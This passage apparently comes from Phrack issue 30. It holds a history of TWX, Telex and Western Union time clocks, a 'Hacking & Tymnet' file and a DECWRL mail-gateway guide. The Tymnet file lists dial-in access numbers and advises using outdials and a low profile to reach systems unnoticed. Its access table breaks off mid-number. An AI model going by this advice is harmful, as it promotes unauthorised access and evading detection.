Western Union, while the latter was run by the Bell System for a number of
years.
TWX literally meant "(T)ype(W)riter e(x)change," and it was Bell's
answer to competition from Western
Union. There were "three row" and "four
row" machines, meaning the number of keys on the keyboard and
how they were
laid out. The "three row" machines were simply part of the regular phone
network; that
is, they could dial out and talk to another TWX also connected
on regular phone lines.
Eventually these were phased out in favor of
"newer and more improved" machines with additional keys,
as well as a paper
tape reader attachment which allowed sending the same message repeatedly to many
different machines. These "four row" machines were not on the regular phone
network, but were assigned
their own area codes (410-510-610-710-810-910)
where they still remain today. The only way a four row
machine could call a
three row machine or vice-versa was through a gateway of sorts which translated
some of the character set unique to each machine.
Western Union's
network was called Telex and in addition to being able to contact (by dial up)
other
similar machines, Telex could connect with TWX (and vice-versa) as
well as all the Western Union
public offices around the country. Until the
late 1950's or early 1960's, every small town in America
had a Western Union
office. Big cities like Chicago had perhaps a dozen of them, and they used
messengers to hand deliver telegrams around town. Telegrams could be placed
in person at any public
office, or could be called in to the nearest public
office.
By arrangement with most telcos, the Western Union office in
town nearly always had the phone number
4321, later supplemented in
automated exchanges with some prefix XXX-4321. Telegrams could be charged
to
your home phone bill (this is still the case in some communities) and from a
coin phone, one did
not ask for 4321, but rather, called the operator and
asked for Western Union. This was necessary
since once the telegram had been
given verbally to the wire clerk, s/he in turn had to flash the hook
and get
your operator back on the line to tell them "collect five dollars and twenty
cents" or
whatever the cost was. Telegrams, like phone calls, could be sent
collect or billed third party. If
you had an account with Western Union,
i.e. a Telex machine in your office, you could charge the calls
there, but
most likely you would simply send the telegram from there in the first place.
Sometime in the early 1960's, Western Union filed suit against AT&T
asking that they turn over their
TWX business to them. They cited an earlier
court ruling, circa 1950's, which said AT&T was prohibited
from
acquiring any more telephone operating companies except under certain
conditions. The Supreme
Court agreed with Western Union that "spoken
messages" were the domain of Ma Bell, but "written
messages" were the domain
of Western Union. So Bell was required to divest itself of the TWX network,
and Western Union has operated it since, although a few years ago they began
phasing out the phrase
"TWX" in favor of "Telex II"; their original device
being "Telex I" of course. TWX still uses ten
digit dialing with 610
(Canada) or 710/910 (USA) being the leading three digits. Apparently 410-510
have been abandoned; or at least they are used very little, and Bellcore has
assigned 510 to the San
Francisco area starting in a year or so. 410 still
has some funny things on it, like the Western Union
"Infomaster," which is a
computer that functions like a gateway between Telex, TWX, EasyLink and some
other stuff.
Today, the Western Union network is but a skeleton of
its former self. Now most of their messages are
handled on dial up terminals
connected to the public phone network. It has been estimated the
TWX/Telex
business is about fifty percent of what it was a decade ago, if that much.
Then there was the Time Service, a neat thing which Western Union
offered for over seventy years,
until it was discontinued in the middle
1960's. The Time Service provided an important function in the
days before
alternating current was commonly available. For example, Chicago didn't have AC
electricity until about 1945. Prior to that we used DC, or direct current.
Well, to run an electric clock, you need 60 cycles AC current for
obvious reasons, so prior to the
conversion from DC power to AC power,
electric wall clocks such as you see in every office were
unheard of. How
were people to tell the time of day accurately? Enter the Western Union clock.
The Western Union, or "telegraph clock" was a spring driven wind up
clock, but with a difference. The
clocks were "perpetually self-winding,"
manufactured by the Self-Winding Clock Company of New York
City. They had
large batteries inside them, known as "telephone cells" which had a life of
about ten
years each. A mechanical contrivance in the clock would rotate as
the clock spring unwound, and once
each hour would cause two metal clips to
contact for about ten seconds, which would pass juice to the
little motor in
the clock which in turn re-wound the main spring. The principle was the same as
the
battery operated clocks we see today. The battery does not actually run
the clock -- direct current
can't do that -- but it does power the tiny
motor which re-winds the spring which actually drives the
clock.
The
Western Union clocks came in various sizes and shapes, ranging from the smallest
dials which were
nine inches in diameter to the largest which were about
eighteen inches in diameter. Some had sweep
second hands; others did not.
Some had a little red light bulb on the front which would flash. The
typical
model was about sixteen inches, and was found in offices, schools,
transportation depots,
radio station offices, and of course in the telegraph
office itself.
The one thing all the clocks had in common was their
brown metal case and cream-colored face, with the
insignia "Western Union"
and their corporate logo in those days which was a bolt of electricity, sort
of like a letter "Z" laying on its side. And in somewhat smaller print
below, the words "Naval
Observatory Time."
The local clocks in an
office or school or wherever were calibrated by a "master clock" (actually a
sub-master) on the premises. Once an hour on the hour, the (sub) master
clock would drop a metal
contact for just a half second, and send about nine
volts DC up the line to all the local clocks. They
in turn had a "tolerance"
of about two minutes on both sides of the hour so that the current coming to
them would yank the minute hand exactly upright onto the twelve from either
direction if the clock was
fast or slow.
The sub-master clocks in
each building were in turn serviced by the master clock in town; usually this
was the one in the telegraph office. Every hour on the half hour, the master
clock in the telegraph
office would throw current to the sub-masters,
yanking them into synch as required. And as for the
telegraph offices
themselves, they were serviced twice a day by -- you guessed it -- the Naval
Observatory Master clock in Our Nation's Capitol, by the same routine.
Someone there would press half
a dozen buttons at the same time, using all
available fingers; current would flow to every telegraph
office and synch
all the master clocks in every community. Western Union charged fifty cents per
month
for the service, and tossed the clock in for free! Oh yes, there was
an installation charge of about
two dollars when you first had service (i.e.
a clock) installed.
The clocks were installed and maintained by the
"clockman," a technician from Western Union who spent
his day going around
hanging new clocks, taking them out of service, changing batteries every few
years for each clock, etc.
What a panic it was for them when "war
time" (what we now call Daylight Savings Time) came around each
year! Wally,
the guy who serviced all the clocks in downtown Chicago had to start on
*Thursday* before
the Sunday official changeover just to finish them all by
*Tuesday* following. He would literally rush
in an office, use his
screwdriver to open the case, twirl the hour hand around one hour forward in the
spring, (or eleven hours *forward* in the fall since the hands could not be
moved backward beyond the
twelve going counterclockwise), slam the case back
on, screw it in, and move down the hall to the next
clock and repeat the
process. He could finish several dozen clocks per day, and usually the office
assigned him a helper twice a year for these events.
He said they
never bothered to line the minute hand up just right, because it would have
taken too
long, and ".....anyway, as long as we got it within a minute or
so, it would synch itself the next
time the master clock sent a signal..."
Working fast, it took a minute to a minute and a half to open
the case,
twirl the minute hand, put the case back on, "stop and b.s. with the
receptionist for a
couple seconds" and move along.
The master clock
sent its signal over regular telco phone lines. Usually it would terminate in
the
main office of whatever place it was, and the (sub) master there would
take over at that point.
Wally said it was very important to do a
professional job of hanging the clock to begin with. It had
to be level, and
the pendulum had to be just right, otherwise the clock would gain or lose more
time
than could be accommodated in the hourly synching process. He said it
was a very rare clock that
actually was out by even a minute once an hour,
let alone the two minutes of tolerance built into the
gear works.
"...Sometimes I would come to work on Monday morning, and find out in
the office that the clock line
had gone open Friday evening. So nobody all
weekend got a signal. Usually I would go down a manhole
and find it open
someplace where one of the Bell guys messed it up, or took it off and never put
it
back on. To find out where it was open, someone in the office would 'ring
out' the line; I'd go around
downtown following the loop as we had it laid
out, and keep listening on my headset for it. When I
found the break or the
open, I would tie it down again and the office would release the line; but then
I had to go to all the clocks *before* that point and restart them, since
the constant current from
the office during the search had usually caused
them to stop."
But he said, time and again, the clocks were usually so
well mounted and hung that "...it was rare we
would find one so far out of
synch that we had to adjust it manually. Usually the first signal to make
it
through once I repaired the circuit would yank everyone in town to make up for
whatever they lost
or gained over the weekend..."
In 1965, Western
Union decided to discontinue the Time Service. In a nostalgic letter to
subscribers,
they announced their decision to suspend operations at the end
of the current month, but said "for old
time's sake" anyone who had a clock
was welcome to keep it and continue using it; there just would not
be any
setting signals from the master clocks any longer.
Within a day or two
of the official announcement, every Western Union clock in the Chicago area
headquarters building was gone. The executives snatched them off the wall,
and took them home for the
day when they would have historical value. All
the clocks in the telegraph offices disappeared about
the same time, to be
replaced with standard office-style electric wall clocks.
-= Exodus =-
'94
Index
==Phrack Inc.== Volume Three, Issue 30, File #3 of 12
[-][-] [-][-] [-][-] [-][-] [-][-] [-][-] [-][-]
[-] [-]
[-]
Hacking & Tymnet [-]
[-] [-]
[-] by [-]
[-] [-]
[-]
Synthecide [-]
[-] [-]
[-][-] [-][-] [-][-] [-][-] [-][-] [-][-] [-][-]
There are literally hundreds of systems connected to some of these
larger networks, like Tymnet and
Telenet. Navigation around these networks
is very simple, and usually well explained in their on-line
documentation.
Furthermore, some systems will actually tell you what is connected and how to
get to
it. In the case of Tymnet, after dialing in, at the log in prompt,
type "information" for the on-line
documentation.
Accessing systems
through networks is as simple as providing an address for it to connect to. The
best
way to learn about the addresses and how to do things on a network is
to read "A Novice's Guide to
Hacking (1989 Edition)" which was in Issue 22,
File 4 of 12, Volume Two (December 23, 1988). Some
points are re-iterated
here.
Once on a network, you provide the NUA (network user address) of
the system you wish to connect to.
NUAs are strings of 15 digits, broken up
in to 3 fields, the NETWORK ADDRESS, the AREA PREFIX, and the
DNIC. Each
field has 5 digits, and are left padded with 0's where necessary.
The
DNIC determines which network to take the address from. Tymnet, for example, is
03106. 03110 is
Telenet.
The AREA PREFIX and NETWORK ADDRESS
determine the connection point. By providing the address of the
system that
you wish to connect to, you will be accessing it through the net... as if you
were calling
it directly. Obviously, then, this provides one more level of
security for access.
By connecting to an outdial, you can increase again
the level of security you enjoy, by using the
outdial in that area to
connect to the remote system.
Addendum -- Accessing Tymnet Over Local
Packet Networks
This is just another way to get that extra step and/or
bypass other routes. This table is copied from
Tymnet's on-line information.
As said earlier, it's a great resource, this on-line information!
BELL
ATLANTIC
NODE CITY STATE SPEED ACCESS NUMBER NTWK
----
------------------- -------------- ------ ------------ ----
03526 DOVER
DELAWARE 300/2400 302/734-9465 @PDN
03526 GEORGETOWN DELAWARE 300/2400
302/856-7055 @PDN
03526 NEWARK DELAWARE 300/2400 302/366-0800 @PDN
03526
WILMINGTON DELAWARE 300/1200 302/428-0030 @PDN
03526 WILMINGTON DELAWARE
2400 302/655-1144 @PDN
06254 WASHINGTON DIST. OF COL. 300/1200
202/479-7214 @PDN
06254 WASHINGTON (MIDTOWN) DIST. OF COL. 2400 202/785-1688
@PDN
06254 WASHINGTON (DOWNTOWN) DIST. OF COL. 300/1200 202/393-6003 @PDN
06254 WASHINGTON (MIDTOWN) DIST. OF COL. 300/1200 202/293-4641 @PDN
06254 WASHINGTON DIST. OF COL. 300/1200 202/546-5549 @PDN
06254
WASHINGTON DIST. OF COL. 300/1200 202/328-0619 @PDN
06254 BETHESDA
MARYLAND 300/1200 301/986-9942 @PDN
06254 COLESVILLE MARYLAND 300/2400
301/989-9324 @PDN
06254 HYATTSVILLE MARYLAND 300/1200 301/779-9935 @PDN
06254 LAUREL MARYLAND 300/2400 301/490-9971 @PDN
06254 ROCKVILLE
MARYLAND 300/1200 301/340-9903 @PDN
06254 SILVER SPRING MARYLAND 300/1200
301/495-9911 @PDN
07771 BERNARDSVILLE NEW JERSEY 300/2400
201/766-7138 @PDN
07771 CLINTON NEW JERSEY 300-1200 201/730-8693 @PDN
07771 DOVER NEW JERSEY 300/2400 201/361-9211 @PDN
07771 EATONTOWN/RED
BANK NEW JERSEY 300/2400 201/758-8000 @PDN
07771 ELIZABETH NEW JERSEY
300/2400 201/289-5100 @PDN
07771 ENGLEWOOD NEW JERSEY 300/2400 201/871-3000
@PDN
07771 FREEHOLD NEW JERSEY 300/2400 201/780-8890 @PDN
07771
HACKENSACK NEW JERSEY 300/2400 201/343-9200 @PDN
07771 JERSEY CITY NEW
JERSEY 300/2400 201/659-3800 @PDN
07771 LIVINGSTON NEW JERSEY 300/2400
201/533-0561 @PDN
07771 LONG BRANCH/RED BANK NEW JERSEY 300/2400
201/758-8000 @PDN
07771 MADISON NEW JERSEY 300/2400 201/593-0004 @PDN
07771 METUCHEN NEW JERSEY 300/2400 201/906-9500 @PDN
07771 MIDDLETOWN
NEW JERSEY 300/2400 201/957-9000 @PDN
07771 MORRISTOWN NEW JERSEY 300/2400
201/455-0437 @PDN
07771 NEWARK NEW JERSEY 300/2400 201/623-0083 @PDN
07771 NEW BRUNSWICK NEW JERSEY 300/2400 201/247-2700 @PDN
07771 NEW
FOUNDLAND NEW JERSEY 300/2400 201/697-9380 @PDN
07771 PASSAIC NEW JERSEY
300/2400 201/473-6200 @PDN
07771 PATERSON NEW JERSEY 300/2400 201/345-7700
@PDN
07771 PHILLIPSBURG NEW JERSEY 300/2400 201/454-9270 @PDN
07771
POMPTON LAKES NEW JERSEY 300/2400 201/835-8400 @PDN
07771 RED BANK NEW
JERSEY 300/2400 201/758-8000 @PDN
07771 RIDGEWOOD NEW JERSEY 300/2400
201/445-4800 @PDN
07771 SOMERVILLE NEW JERSEY 300/2400 201/218-1200 @PDN
07771 SOUTH RIVER NEW JERSEY 300/2400 201/390-9100 @PDN
07771 SPRING
LAKE NEW JERSEY 300/2400 201/974-0850 @PDN
07771 TOMS RIVER NEW JERSEY
300/2400 201/286-3800 @PDN
07771 WASHINGTON NEW JERSEY 300/2400 201/689-6894
@PDN
07771 WAYNE/PATERSON NEW JERSEY 300/2400 201/345-7700 @PDN
03526 ALLENTOWN PENNSYLVANIA 300/1200 215/435-0266 @PDN
11301
ALTOONA PENNSYLVANIA 300/1200 814/946-8639 @PDN
11301 ALTOONA PENNSYLVANIA
2400 814/949-0505 @PDN
03526 AMBLER PENNSYLVANIA 300/1200 215/283-2170 @PDN
10672 AMBRIDGE PENNSYLVANIA 300/1200 412/266-9610 @PDN
10672 CARNEGIE
PENNSYLVANIA 300/1200 412/276-1882 @PDN
10672 CHARLEROI PENNSYLVANIA
300/1200 412/483-9100 @PDN
03526 CHESTER HEIGHTS PENNSYLVANIA 300/1200
215/358-0820 @PDN
03526 COATESVILLE PENNSYLVANIA 300/1200 215/383-7212 @PDN
10672 CONNELLSVILLE PENNSYLVANIA 300/1200 412/628-7560 @PDN
03526
DOWNINGTON/COATES. PENNSYLVANIA 300/1200 215/383-7212 @PDN
03562 DOYLESTOWN
PENNSYLVANIA 300/1200 215/340-0052 @PDN
03562 GERMANTOWN PENNSYLVANIA
300/1200 215-843-4075 @PDN
10672 GLENSHAW PENNSYLVANIA 300/1200 412/487-6868
@PDN
10672 GREENSBURG PENNSYLVANIA 300/1200 412/836-7840 @PDN
11301
HARRISBURG PENNSYLVANIA 300/1200 717/236-3274 @PDN
11301 HARRISBURG
PENNSYLVANIA 2400 717/238-0450 @PDN
10672 INDIANA PENNSYLVANIA 300/1200
412/465-7210 @PDN
03526 KING OF PRUSSIA PENNSYLVANIA 300/1200 215/270-2970
@PDN
03526 KIRKLYN PENNSYLVANIA 300/1200 215/789-5650 @PDN
03526
LANSDOWNE PENNSYLVANIA 300/1200 215/626-9001 @PDN
10672 LATROBE PENNSYLVANIA
300/1200 412/537-0340 @PDN
11301 LEMOYNE/HARRISBURG PENNSYLVANIA 300/1200
717/236-3274 @PDN
10672 MCKEESPORT PENNSYLVANIA 300/1200 412/673-6200 @PDN
10672 NEW CASTLE PENNSYLVANIA 300/1200 412/658-5982 @PDN
10672 NEW
KENSINGTON PENNSYLVANIA 300/1200 412/337-0510 @PDN
03526 NORRISTOWN
PENNSYLVANIA 300/1200 215/270-2970 @PDN
03526 PAOLI PENNSYLVANIA 300/1200
215/648-0010 @PDN
03562 PHILADELPHIA PENNSYLVANIA 300/1200 215/923-7792 @PDN
03562 PHILADELPHIA PENNSYLVANIA 300/1200 215/557-0659 @PDN
03562
PHILADELPHIA PENNSYLVANIA 300/1200 215/545-7886 @PDN
03562 PHILADELPHIA
PENNSYLVANIA 300/1200 215/677-0321 @PDN
03562 PHILADELPHIA PENNSYLVANIA 2400
215/625-0770 @PDN
10672 PITTSBURGH PENNSYLVANIA 300/1200 412/281-8950 @PDN
10672 PITTSBURGH PENNSYLVANIA 300/1200 412-687-4131 @PDN
10672
PITTSBURGH PENNSYLVANIA 2400 412/261-9732 @PDN
10672 POTTSTOWN PENNSYLVANIA
300/1200 215/327-8032 @PDN
03526 QUAKERTOWN PENNSYLVANIA 300/1200
215/538-7032 @PDN
03526 READING PENNSYLVANIA 300/1200 215/375-7570 @PDN
10672 ROCHESTER PENNSYLVANIA 300/1200 412/728-9770 @PDN
03526 SCRANTON
PENNSYLVANIA 300/1200 717/348-1123 @PDN
03526 SCRANTON PENNSYLVANIA 2400
717/341-1860 @PDN
10672 SHARON PENNSYLVANIA 300/1200 412/342-1681 @PDN
03526 TULLYTOWN PENNSYLVANIA 300/1200 215/547-3300 @PDN
10672 UNIONTOWN
PENNSYLVANIA 300/1200 412/437-5640 @PDN
03562 VALLEY FORGE PENNSYLVANIA
300/1200 215/270-2970 @PDN
10672 WASHINGTON PENNSYLVANIA 300/1200
412/223-9090 @PDN
03526 WAYNE PENNSYLVANIA 300/1200 215/341-9605 @PDN
10672 WILKINSBURG PENNSYLVANIA 300/1200 412/241-1006 @PDN
06254
ALEXANDRIA VIRGINIA 300/1200 703/683-6710 @PDN
06254 ARLINGTON VIRGINIA
300/1200 703/524-8961 @PDN
06254 FAIRFAX VIRGINIA 300/1200 703/385-1343 @PDN
06254 MCLEAN VIRGINIA 300/1200 703/848-2941 @PDN
@PDN BELL
ATLANTIC - NETWORK NAME IS PUBLIC DATA NETWORK (PDN)
(CONNECT
MESSAGE)
. _. _. _< _C _R _> _ (SYNCHRONIZES DATA SPEEDS)
WELCOME TO THE BPA/DST PDN
*. _T _ _< _C _R _> _ (TYMNET
ADDRESS)
131069 (ADDRESS CONFIRMATION - TYMNET DNIC)
COM
(CONFIRMATION OF CALL SET-UP)
-GWY 0XXXX- TYMNET: PLEASE LOG IN: (HOST #
WITHIN DASHES)
BELL SOUTH
NODE CITY STATE DENSITY ACCESS
NUMBER MODEM
----- -------------------- -------------- ------ ------------
-----
10207 ATLANTA GEORGIA 300/1200 404/261-4633 @PLSK
10207 ATHENS
GEORGIA 300/1200 404/354-0614 @PLSK
10207 COLUMBUS GEORGIA 300/1200
404/324-5771 @PLSK
10207 ROME GEORGIA 300/1200 404/234/7542 @PLSK
@PLSK BELLSOUTH - NETWORK NAME IS PULSELINK
(CONNECT
MESSAGE)
. _. _. _ _< _C _R _> _ (SYNCHRONIZES DATA SPEEDS)
(DOES NOT ECHO TO THE TERMINAL)
CONNECTED
PULSELINK
1 _3 _1
_0 _6 _ (TYMNET ADDRESS)
(DOES NOT ECHO TO THE TERMINAL)
PULSELINK:
CALL CONNECTED TO 1 3106
-GWY 0XXXX- TYMNET: PLEASE LOG IN: (HOST #
WITHIN DASHES)
PACIFIC BELL
NODE CITY STATE DENSITY ACCESS
NUMBER NTWK
----- ------------------- -------------- ------ ------------
----
03306 BERKELEY CALIFORNIA 300/1200 415-548-2121 @PPS
06272 EL
SEGUNDO CALIFORNIA 300/1200 213-640-8548 @PPS
06272 FULLERTON CALIFORNIA
300/1200 714-441-2777 @PPS
06272 INGLEWOOD CALIFORNIA 300/1200 213-216-7667
@PPS
06272 LOS ANGELES(DOWNTOWN) CALIFORNIA 300/1200 213-687-3727 @PPS
06272 LOS ANGELES CALIFORNIA 300/1200 213-480-1677 @PPS
03306 MOUNTAIN
VIEW CALIFORNIA 300/1200 415-960-3363 @PPS
03306 OAKLAND CALIFORNIA 300/1200
415-893-9889 @PPS
03306 PALO ALTO CALIFORNIA 300/1200 415-325-4666 @PPS
06272 PASADENA CALIFORNIA 300/1200 818-356-0780 @PPS
03306 SAN FRANCISCO
CALIFORNIA 300/1200 415-543-8275 @PPS
03306 SAN FRANCISCO CALIFORNIA
300/1200 415-626-5380 @PPS
03306 SAN FRANCISCO CALIFORNIA 300/1200
415-362-2280 @PPS
03306 SAN JOSE CALIFORNIA 300/1200 408-920-0888 @PPS
06272 SANTA ANNA CALIFORNIA 300/1200 714-972-9844 @PPS
06272 VAN NUYS
CALIFORNIA 300/1200 818-780-1066 @PPS
@PPS PACIFIC BELL - NETWORK
NAME IS PUBLIC PACKET SWITCHING (PPS)
(CONNECT MESSAGE)
. _. _.
_< _C _R _ (SYNCHRONIZES DATA SPEEDS)>
(DOES NOT ECHO TO THE TERMINAL)
ONLINE 1200
WELCOME TO PPS: 415-XXX-XXXX
1 _3 _1 _0 _6 _9 _
(TYMNET ADDRESS)
(DOES NOT ECHO UNTIL TYMNET RESPONDS)
-GWY 0XXXX-
TYMNET: PLEASE LOG IN: (HOST # WITHIN DASHES)
SOUTHWESTERN BELL
NODE CITY STATE DENSITY ACCESS NUMBERS NWRK
-----
-------------------- -------------- ------- ------------ -----
05443 KANSAS
CITY KANSAS 300/1200 316/225-9951 @MRLK
05443 HAYS KANSAS 300/1200
913/625-8100 @MRLK
05443 HUTCHINSON KANSAS 300/1200 316/669-1052 @MRLK
05443 LAWRENCE KANSAS 300/1200 913/841-5580 @MRLK
05443 MANHATTAN KANSAS
300/1200 913/539-9291 @MRLK
05443 PARSONS KANSAS 300/1200 316/421-0620 @MRLK
05443 SALINA KANSAS 300/1200 913/825-4547 @MRLK
05443 TOPEKA KANSAS
300/1200 913/235-1909 @MRLK
05443 WICHITA KANSAS 300/1200 316/269-1996 @MRLK
04766 BRIDGETON/ST. LOUIS MISSOURI 300/1200 314/622-0900 @MRLK
04766 ST. LOUIS MISSOURI 300/1200 314/622-0900 @MRLK
06510 ADA
OKLAHOMA 300/1200 405/4
On a side note, the recent book The Cuckoo's Egg
provides some interesting information (in the form of
a story, however) on a
Tymnet hacker. Remember that he was into BIG things, and hence he was cracked
down upon. If you keep a low profile, networks should provide a good access
method.
If you can find a system that is connected to the Internet that
you can get on from Tymnet, you are
doing well.
-- Exodus -- '94
Index
==Phrack Inc.== Volume Three, Issue 30, File #5 of 12
()()()()()()()()()()()()()()()()()()()
() ()
() The DECWRL Mail
Gateway ()
() ()
() by Dedicated Link ()
() ()
() September 20,
1989 ()
() ()
()()()()()()()()()()()()()()()()()()()
INTRODUCTION
DECWRL is a mail gateway computer operated by
Digital's Western Research Laboratory in Palo Alto,
California. Its purpose
is to support the interchange of electronic mail between Digital and the
"outside world."
DECWRL is connected to Digital's Easynet, and also
to a number of different outside electronic mail
networks. Digital users can
send outside mail by sending to DECWRL::"outside-address", and digital
users
can also receive mail by having your correspondents route it through DECWRL. The
details of
incoming mail are more complex, and are discussed below.
It is vitally important that Digital employees be good citizens of the
networks to which we are
connected. They depend on the integrity of our user
community to ensure that tighter controls over the
use of the gateway are
not required. The most important rule is "no chain letters," but there are
other rules depending on whether the connected network that you are using is
commercial or
non-commercial.
The current traffic volume (September
1989) is about 10,000 mail messages per day and about 3,000
USENET messages
per day. Gatewayed mail traffic has doubled every year since 1983. DECWRL is
currently
a Vax 8530 computer with 48 megabytes of main memory, 2500
megabytes of disk space, 8 9600-baud
(Telebit) modem ports, and various
network connections. They will shortly be upgrading to a Vax 8650
system.
They run Ultrix 3.0 as the base operating system.
ADMINISTRATION
The gateway has engineering staff, but no administrative or clerical
staff. They work hard to keep it
running, but they do not have the resources
to answer telephone queries or provide tutorials in its
use.
They
post periodic status reports to the USENET newsgroup dec.general. Various
helpful people usually
copy these reports to the VAXNOTES "gateways"
conference within a day or two.
HOW TO SEND MAIL
DECWRL is
connected to quite a number of different mail networks. If you were logged on
directly to
it, you could type addresses directly, e.g.
To:
strange!foreign!address.
But since you are not logged on directly to the
gateway, you must send mail so that when it arrives at
the gateway, it will
be sent as if that address had been typed locally.
* Sending from VMS
If you are a VMS user, you should use NMAIL, because VMS mail does not know
how to requeue and
retry mail when the network is congested or disconnected.
From VMS, address your mail like this:
To:
nm%DECWRL::"strange!foreign!address"
The quote characters (") are important,
to make sure that VMS doesn't try to interpret
strange!foreign!address
itself. If you are typing such an address inside a mail program, it will
work as advertised. If you are using DCL and typing directly to the command
line, you should
beware that DCL likes to remove quotes, so you will have to
enclose the entire address in quotes,
and then put two quotes in every place
that one quote should appear in the address:
$ mail test.msg
"nm%DECWRL::""foreign!addr""" /subj="hello"
Note the three quotes in a row
after foreign!addr. The first two of them are doubled to produce a
single
quote in the address, and the third ends the address itself (balancing the quote
in front
of the nm%).
Here are some typical outgoing mail addresses as
used from a VMS system:
To: nm%DECWRL::"lll-winkin!netsys!phrack"
To:
nm%DECWRL::"postmaster@msp.pnet.sc.edu"
To:
nm%DECWRL::"netsys!phrack@uunet.uu.net"
To:
nm%DECWRL::"phrackserv@CUNYVM.bitnet"
To:
nm%DECWRL::"Chris.Jones@f654.n987.z1.fidonet.org"
* Sending from Ultrix
If your Ultrix system has been configured for it, then you can, from your
Ultrix system, just send
directly to the foreign address, and the mail
software will take care of all of the gateway
routing for you. Most Ultrix
systems in Corporate Research and in the Palo Alto cluster are
configured
this way.
To find out whether your Ultrix system has been so configured,
just try it and see what happens.
If it doesn't work, you will receive
notification almost instantly.
NOTE: The Ultrix mail system is extremely
flexible; it is almost completely configurable by the
customer. While this
is valuable to customers, it makes it very difficult to write global
instructions for the use of Ultrix mailers, because it is possible that the
local changes have
produced something quite unlike the vendor-delivered
mailer. One of the popular changes is to
tinker with the meaning of quote
characters (") in Ultrix addresses. Some systems consider that
these two
addresses are the same:
site1!site2!user@host.dec.com
and
"site1!site2!user"@host.dec.com
while others are configured so that one
form will work and the other will not. All of these
examples use the quotes.
If you have trouble getting the examples to work, please try them again
without the quotes. Perhaps your Ultrix system is interpreting the quotes
differently.
If your Ultrix system has an IP link to Palo Alto (type
"/etc/ping decwrl.dec.com" to find out if
it does), then you can route your
mail to the gateway via IP. This has the advantage that your
Ultrix mail
headers will reach the gateway directly, instead of being translated into DECNET
mail
headers and then back into Ultrix at the other end. Do this as follows:
To: "alien!address"@decwrl.dec.com
The quotes are necessary only if the
alien address contains a ! character, but they don't hurt if
you use them
unnecessarily. If the alien address contains an "@" character, you will need to
change it into a "%" character. For example, to send via IP to
joe@widget.org, you should address
the mail
To:
"joe%widget.org"@decwrl.dec.com
If your Ultrix system has only a DECNET link
to Palo Alto, then you should address mail in much
the same way that VMS
users do, save that you should not put the nm% in front of the address:
To:
DECWRL::"strange!foreign!address"
Here are some typical outgoing mail
addresses as used from an Ultrix system that has IP access.
Ultrix systems
without IP access should use the same syntax as VMS users, except that the nm%
at
the front of the address should not be used.
To:
"lll-winken!netsys!phrack"@decwrl.dec.com
To:
"postmaster%msp.pnet.sc.edu"@decwrl.dec.com
To:
"phrackserv%CUNYVM.bitnet"@decwrl.dec.com
To:
"netsys!phrack%uunet.uu.net"@decwrl.dec.com
To:
"Chris.Jones@f654.n987.z1.fidonet.org"@decwrl.dec.com
DETAILS OF USING
OTHER NETWORKS
All of the world's computer networks are connected
together, more or less, so it is hard to draw exact
boundaries between them.
Precisely where the Internet ends and UUCP begins is a matter of
interpretation.
For purposes of sending mail, though, it is
convenient to divide the network universe into these
categories:
*
Easynet Digital's internal DECNET network. Characterized by addresses of the
form NODE::USER.
Easynet can be used for commercial purposes.
* Internet
A collection of networks including the old ARPAnet, the NSFnet, the CSnet, and
others.
Most international research, development, and educational
organizations are connected in some
fashion to the Internet. Characterized
by addresses of the form user@site.subdomain.domain. The
Internet itself
cannot be used for commercial purposes.
* UUCP A very primitive network with
no management, built with auto-dialers phoning one computer
from another.
Characterized by addresses of the form place1!place2!user. The UUCP network can
be
used for commercial purposes provided that none of the sites through
which the message is routed
objects to that.
* USENET Not a network at
all, but a layer of software built on top of UUCP and Internet.
* BITNET An
IBM-based network linking primarily educational sites. Digital users can send to
BITNET
as if it were part of Internet, but BITNET users need special
instructions for reversing the
process. BITNET cannot be used for commercial
purposes.
* Fidonet A network of personal computers. I am unsure of the
status of using Fidonet for commercial
purposes, nor am I sure of its
efficacy.
DOMAINS AND DOMAIN ADDRESSING
There is a particular
network called "the Internet;" it is somewhat related to what used to be "the
ARPAnet." The Internet style of addressing is flexible enough that people
use it for addressing other
networks as well, with the result that it is
quite difficult to look at an address and tell just what
network it is
likely to traverse. But the phrase "Internet address" does not mean "mail
address of
some computer on the Internet" but rather "mail address in the
style used by the Internet."
Terminology is even further confused because
the word "address" means one thing to people who build
networks and
something entirely different to people who use them. In this file an "address"
is
something like "mike@decwrl.dec.com" and not "192.1.24.177" (which is
what network engineers would
call an "internet address").
The
Internet naming scheme uses hierarchical domains, which despite their title are
just a bookkeeping
trick. It doesn't really matter whether you say
NODE::USER or USER@NODE, but what happens when you
connect two companies'
networks together and they both have a node ANCHOR?? You must, somehow, specify
which ANCHOR you mean. You could say ANCHOR.DEC::USER or DEC.ANCHOR::USER or
USER@ANCHOR.DEC or
USER@DEC.ANCHOR. The Internet convention is to say
USER@ANCHOR.DEC, with the owner (DEC) after the
name (ANCHOR).
But
there could be several different organizations named DEC. You could have Digital
Equipment
Corporation or Down East College or Disabled Education Committee.
The technique that the Internet
scheme uses to resolve conflicts like this
is to have hierarchical domains. A normal domain isn't DEC
or STANFORD, but
DEC.COM (commercial) and STANFORD.EDU (educational). These domains can be
further
divided into ZK3.DEC.COM or CS.STANFORD.EDU. This doesn't resolve
conflicts completely, though: both
Central Michigan University and
Carnegie-Mellon University could claim to be CMU.EDU. The rule is that
the
owner of the EDU domain gets to decide, just as the owner of the CMU.EDU gets to
decide whether
the Electrical Engineering department or the Elementary
Education department gets subdomain
EE.CMU.EDU.
The domain scheme,
while not perfect, is completely extensible. If you have two addresses that can
potentially conflict, you can suffix some domain to the end of them, thereby
making, say, decwrl.UUCP
be somehow different from DECWRL.ENET.
DECWRL's entire mail system is organized according to Internet domains,
and in fact we handle all mail
internally as if it were Internet mail.
Incoming mail is converted into Internet mail, and then routed
to the
appropriate domain; if that domain requires some conversion, then the mail is
converted to the
requirements of the outbound domain as it passes through
the gateway. For example, they put Easynet
mail into the domain
Username@f.n.z.ifna.org
In other words,
if I wanted to mail to Silicon Swindler at 1:135/5, the address would be
Silicon_Swindler@f5.n135.z1.ifna.org and, provided that your mailer knows
the .ifna.org domain, it
should get through alright. Apparently, as of the
writing of this article, they have implemented a new
gateway name called
fidonet.org which should work in place of ifna.org in all routings. If your
mailer
does not know either of these domains, use the above routing but
replace the first "@" with a "%" and
then afterwards, use either of the
following mailers after the "@": CS.ORST.EDU or K9.CS.ORST.EDU
(i.e.
username%f.n.z.fidonet.org@CS.ORST.EDU [or replace
CS.ORST.EDU with
K9.CS.ORST.EDU]).
The following is a list compiled
by Bill Fenner (WCF@PSUECL.BITNET) that was posted on INFONETS DIGEST
which
lists a number of FIDONET gateways:
Net Node Node Name
~~~ ~~~~
~~~~~~~~~
